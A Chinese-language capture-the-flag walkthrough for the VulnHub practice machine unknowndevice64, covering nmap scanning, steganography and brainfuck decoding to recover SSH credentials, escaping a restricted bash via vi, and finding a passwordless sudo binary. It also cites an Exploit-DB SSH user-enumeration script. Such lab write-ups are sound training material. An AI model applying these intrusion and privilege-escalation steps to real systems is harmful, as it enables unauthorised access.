[unknowndevice64: 1]下载地址:https://www.vulnhub.com/entry/unknowndevice64-1,293/
target:获取机器root权限,查看/root/flag.txt
1.镜像本间导入VMware;(nat模式,镜像默认启用DHCP,kaili也在同网段(192.168.80.0/24));
2.扫描网段,获取靶机IP
root@kali:/home/ud64# nmap -sn 192.168.80.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-15 01:43 EDT
Nmap scan report for 192.168.80.1
Host is up (0.00042s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.80.134
Host is up (0.0011s latency).
MAC Address: 00:0C:29:D4:9F:79 (VMware)
Nmap scan report for 192.168.80.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:EA:7D:F3 (VMware)
Nmap scan report for 192.168.80.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 7.97 seconds
3.nmap扫描靶机,查看活动端口
root@kali:/home/ud64# nmap -p- -sS -sV 192.168.80.134
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-15 00:00 EDT
Nmap scan report for 192.168.80.134
Host is up (0.00060s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
1337/tcp open ssh OpenSSH 7.7 (protocol 2.0)
31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
MAC Address: 00:0C:29:D4:9F:79 (VMware)
显示靶机ssh端口为1337,另外靶机为http server,端口为31337;
4.web登录192.168.80.134:31337,开发者模式查看网页源码;
看到如下文件key_is_h1dd3n.jpg,提示key藏在这个jpg图片中;
image.png
下载图片到kali
wget http://192.168.80.134:31337/key_is_h1dd3n.jpg5.使用Steghide查实破解图片隐藏的信息;关于Steghide的信息可以自行google;
root@kali:/home/ud64# apt-get install steghide #非kali自带,安装steghide
root@kali:/home/ud64# steghide --extract -sf key_is_h1dd3n.jpg -p h1dd3n #steghide解密要使用原来加密使用的密码,密码根据图片名字猜测,运气不错h1dd3n是密码
wrote extracted data to "h1dd3n.txt".
root@kali:/home/ud64# cat h1dd3n.txt #查看解密文件
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.-----------------.<----------------.--.++++++.---------.>-----------------------.<<+++.++.>+++++.--.++++++++++++.>++++++++++++++++++++++++++++++++++++++++.-----------------.
6.文件信息为一种brainfuck的程序语言,使用在线工具可解https://copy.sh/brainfuck/,在线解密后即可获取到ssh的用户名和密码;
7.登录靶机ssh ****@192.168.80.134 -p 1337(为不剧透,隐去了登录用户名)
8.登录发现为非root用户,需要提权
ud64@unknowndevice64_v1:~$ ls
-rbash: /bin/ls: restricted: cannot specify `/' in command names
ud64@unknowndevice64_v1:~$ sudo -l
-rbash: sudo: command not found
9.按两次tab键,显示目前用户可执行的命令
ud64@unknowndevice64_v1:~$
! ]] builtin compgen date done esac false function id let mc read set test true unalias while
./ alias caller complete declare echo eval fc getopts if local popd readarray shift then type unset whoami
: bg case compopt dirs elif exec fg hash in logout printf readonly shopt time typeset until {
[ bind cd continue disown else exit fi help jobs ls pushd return source times ulimit vi }
[[ break command coproc do enable export for history kill mapfile pwd select suspend trap umask wait
发现可以使用vi,通过vi可以突破受限的shell
image.png
sh-4.4$ export PATH=/bin:/usr/bin:$PATH #修改环境变量
sh-4.4$ cat flagRoot.txt #这步已经可以查看flag文件了
sh-4.4$ sudo -l #这里可以发现一个有趣的东西,通过/usr/bin/sysud64可以执行任何root权限的命令
User ud64 may run the following commands on unknowndevice64_v1:
(ALL) NOPASSWD: /usr/bin/sysud64
使用到的工具:
nmap
steghide 开源隐写程序
brainfuck 程序语言
ssh用户名枚举(https://www.exploit-db.com/exploits/45939
)代码35行需要修改sock.connect((args.target, int(args.port)))使用方式python ssh_enum_user.py -p 1337 192.168.80.134 root
